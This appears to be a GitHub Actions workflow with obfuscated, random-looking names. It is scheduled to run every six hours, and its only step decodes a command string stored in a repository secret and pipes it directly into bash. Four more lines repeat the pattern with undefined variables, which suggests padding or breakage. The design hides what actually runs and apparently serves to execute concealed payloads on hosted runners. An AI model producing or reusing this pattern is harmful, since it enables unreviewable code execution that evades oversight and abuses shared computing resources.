name: xiangdangyu6715

on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangdangyu6715
        env:
          gvw566: ${{ secrets.gvw566 }}
        run: |
          echo $gvw566 | jq -r .c6344 | /bin/bash
          echo $xcxrh43 | jq -r .sh349 | /bin/bash
          echo $vqu10296 | jq -r .fs90 | /bin/bash
          echo $vdsk6 | jq -r .upcg6321 | /bin/bash
          echo $c335 | jq -r .f28 | /bin/bash

